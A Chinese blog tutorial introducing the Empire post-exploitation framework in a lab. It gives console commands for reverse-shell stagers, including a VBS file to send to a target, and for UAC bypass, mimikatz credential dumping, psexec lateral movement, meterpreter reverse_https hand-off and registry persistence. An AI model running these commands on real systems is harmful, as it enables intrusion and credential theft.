开发者社区> spleated> 正文

empire入门

简介: 参考文献:http://www.52bug.cn/%E9%BB%91%E5%AE%A2%E6%8A%80%E6%9C%AF/4158.htmlhttp://www.
+关注继续查看

参考文献:http://www.52bug.cn/%E9%BB%91%E5%AE%A2%E6%8A%80%E6%9C%AF/4158.html
http://www.freebuf.com/articles/network/175097.html
https://www.tuicool.com/articles/aQRJnqr
https://www.anquanke.com/post/id/87328
https://www.anquanke.com/post/id/87333

环境

ubuntu16.04
win10(所有防御都没关)

empire简介

Empire是一个针对windows平台的使用PowerShell脚本作为攻击载荷的渗透攻击框架,包括了从stager生成、提权到渗透维持的一系列功能。Empire实现了无需powershell.exe就可运行PowerShell代理的功能。

安装

git clone https://github.com/EmpireProject/Empire.git
cd Empire
cd setup
./install.sh 
./reset.sh

设置监听

lsof -i:80       //查看端口
./empire          //打开Empire工具
listeners        //建立一个监听
uselistener     //设置采用何种模式,空格加双击Tab键可以看到一共有9种模式
uselistener http   //设置http监听模式
set Name test     //设置相应参数
set Host xxx.xxx.xxx.xxx
execute   //运行
img_b9711466607e960532086835e4ed1cd0.png

img_2eca6adcd7471f1a6635b3d70ec6a237.png

生成木马

设置完监听,接着生成木马,输入usestager以后按下空格然后在按下tab键,可以看到总共是26个模块。其中multi为通用模块、osx为mac操作系统,还有linux与windows模块。 生成的文件类型有.dll,bat,vbs等。

1.launcher反弹shell代理

launcher python test

img_75fcf719f248ab46bf2710e330272b09.png

生成的内容直接贴到其他linux系统中

launcher powershell test

img_75e6195f7c81030a0894be8f5c29afd1.png

生成的内容直接贴到其他windows系统中(Username带有*的是已提权成功的代理)
2.vbs反弹shell代理

(Empire: listeners) > usestager windows/launcher_vbs
(Empire: stager/windows/launcher_vbs) > set Listener test
(Empire: stager/windows/launcher_vbs) > execute
img_5c9747e64451a861eb15e5557cc5eeea.png

生成的vbs文件可以通过xftp下载,并发给你的攻击目标,只要对方一点,就可以拿到目标的shell了

PS:其他的操作类似就不再一一记录了

连接代理及基本使用

agents                         //回连的靶机
interact UIK16xxx     //interact命令跟上刚刚上线的主机Name的名,交互
shell net user       //使用cmd命令的时候,要使用`shell+命令`的格式
list stale          //查看已丢失的代理
remove stale       //移除已丢失的代理
sc                //目标截图
Download         //下载文件
upload          //上传文件
img_50011ad815ac9fb3c3a2896021efba84.png
  • usemodule模块
(Empire: F76ADxxx) > usemodule
code_execution #代码执行
collection #信息收集模块、屏幕截图、键盘记录 、剪贴板记录等
credentials #密码凭据的获取和转储
exfiltration #指定ip进行端口扫描
lateral_movement #横向渗透模块
management #用来执行些系统设置,和邮件信息的收集
persistence #权限维持工具
privesc #权限提升
recon #侦察
situational_awareness #评估主机运行环境,网络运行环境
trollsploit #恶作剧
  • UAC提权模块
    这个需要给电脑上发文件,但是直接被查杀了
(Empire: agents) > interact A9U38xxx
(Empire: A9U38xxx) > usemodule privesc/bypassuac
(Empire: powershell/privesc/bypassuac) > set Listener test
(Empire: powershell/privesc/bypassuac) > execute
  • 使用Empire内置模块ms16-032提权
(Empire: A9U38xxx) > usemodule privesc/ms16-032
(Empire: powershell/privesc/ms16-032) > set Listener test
(Empire: powershell/privesc/ms16-032) > execute
  • 收集目标有用的信息
(Empire: A9U38xxx) > usemodule situational_awareness/host/winenum
(Empire: powershell/situational_awareness/host/winenum) > execute
  • mimikatz模块(只能在windows的环境上使用)
mimikatz   //需要对带有*的权限才能获取系统账号密码
creds      //查看所有hash值包括明文,数据库中写入的各类凭据
creds export /root/1.csv   //导出hash凭证到指定的路径的格式
  • AllChecks模块(检查提权方法)
(Empire: A9U38xxx) > usemodule privesc/powerup/allchecks
(Empire: powershell/privesc/powerup/allchecks) > execute
  • psexec模块横向生成一个反弹代理
(Empire: S4DU3VSRKR3U1DDF) > usemodule lateral_movement/invoke_psexec
(Empire: lateral_movement/invoke_psexec) > info
(Empire: lateral_movement/invoke_psexec) > set Listener test
(Empire: lateral_movement/invoke_psexec) > set ComputerName DESKTOP-14(`agents`命令下的`Username`的`\`前的名字)
(Empire: lateral_movement/invoke_psexec) > execute
Empire: lateral_movement/invoke_psexec) > agents
  • Empire和msf的联动
    利用Empire派生一个meterpreter的shell回来
    在msf下设置监听,通过https的方式反向连接。
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost xxx.xxx.xxx.xxx
set lport 443
exploit
img_da7372ede4dcdac7eab1f53cd541c412.png
3.png

同样empire也建立个监听

(Empire: agents) > interact A9U38xxx
(Empire: A9U38xxx) > usemodule code_execution/invoke_shellcode
(Empire: powershell/code_execution/invoke_shellcode) > set Lport 443
(Empire: powershell/code_execution/invoke_shellcode) > set Lhost xxx.xxx.xxx.xxx
(Empire: powershell/code_execution/invoke_shellcode) > execute
  • 权限维持(registry)
(Empire: 3K5AExxx) > usemodule persistence/elevated/registry*
(Empire: powershell/persistence/elevated/registry) > set Listener test
(Empire: powershell/persistence/elevated/registry) > execute

在windows注册表regedit HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Debug可以看到

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
Autodesk Maya2023 安装教程(小白看了也说understand)
Maya是Autodesk旗下的著名三维建模和动画软件,应用对象是专业的影视广告,角色动画,电影特技等。Maya功能完善,工作灵活,制作效率极高,渲染真实感极强,是电影级别的高端制作软件。
70 0
上古神器Gvim--从入门到精通
上古神器Gvim--从入门到精通
90 0
Hugo入门
1创建站点:hugo new site "+文件夹名"2下载博客主题:打开https://themes.gohugo.io/,复制粘贴命令即可3新建文章:hugo new "+文件名.md"4启动hugo:hugo serve --主题名 --buildDrafts5解决fatal: Not a g...
949 0
CTF入门篇writeup——D0g3 Games
今天在网上找到一个CTF的小游戏,题目我做了几道感觉挺简单,很适合入门,之前了解CTF,参加各种杯或者是看各种比赛题的writeup,感觉太难了,想到这我还是决定从点滴做起,记录一下学习过程,同时也想做一套CTF从入门到精通的教程。
2664 0
转帖:DotNet 资源大全中文版
(注:下面用 [$] 标注的表示收费工具,但部分收费工具针对开源软件的开发/部署/托管是免费的) API 框架 NancyFx:轻量、用于构建 HTTP 基础服务的非正式(low-ceremony)框架,基于.Net 及 Mono 平台。
1515 0
CakePHP入门笔记
从cakephp.org下载目前稳定版本是1.3.11。下载后解压到apache的htdoc目录,并重命名为cakephp。 浏览器中,访问与 Web 服务器的 Web 根目录相对应的 URL。
905 0
+关注
spleated
渗透测试入门的小白一只
文章
问答
文章排行榜
最热
最新
相关电子书
更多
低代码开发师(初级)实战教程
立即下载
阿里巴巴DevOps 最佳实践手册
立即下载
冬季实战营第三期:MySQL数据库进阶实战
立即下载